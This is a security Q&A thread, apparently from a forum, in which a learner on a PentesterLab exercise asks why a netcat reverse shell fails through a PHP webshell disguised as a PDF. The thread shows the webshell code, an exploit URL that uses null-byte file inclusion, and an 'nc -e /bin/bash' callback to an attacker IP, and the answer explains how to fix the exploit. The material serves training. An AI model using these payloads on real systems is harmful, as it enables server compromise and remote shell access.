# Failed to connect to netcat reverse shell

Tags: web-application, php, penetration-test

I am doing an exercise of PentesterLab, I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:

```
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
```

Now I want to create a reverse shell using nc with following commands, but it does not work properly:

```
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
```

If I input commands at 192.168.117.128 then enter, nothing was output.

While, if I run the following commands directly in the VM(the target server), it connects to the attacker properly:

```
/bin/nc 192.168.117.128 8001 -e /bin/bash
```

Output of commands are properly echoed at 192.168.117.128

I wonder why netcat works in VM properly but does not work in webshell?

Anyone's help is appreciated, thanks.

Comment: What does the apache logs say? Also, do you see the process in "ps aux"?

Comment: there's no nc in "ps aux | grep nc", and I can't access /var/apache2/log because I don't have enough authority, with a warning "permission denied"

Comment: Ok, think I've spotted something. You probably don't need the %00 in your query. How does it work without it?

Comment: The %00 is indeed neccessary to truncate the default extension '.php'. It returned an error without %00, "Warning: include(uploads/1.pdf.php): failed to open stream: No such file or directory in /var/www/index.php on line 28 Warning: include(): Failed opening 'uploads/1.pdf.php' for inclusion (include_path='.:') in /var/www/index.php on line 28 "

Comment: You are right, my lazy eye did not spot it was part of the GET parameters

Comment: So, could you give any more advices?

Comment: Have you tried encoding the spaces in your command with %20?

Comment: The browser will automatically encode the character, isn't it?

Comment: Are you running your nc listener in a vm? Is the network using NAT or bridged? If its running NAT then you will not be able to connect.

Answer (score 2):

Put your cmd parameter before the null byte injection in the exploit URL. Null will cause your query string to terminate early.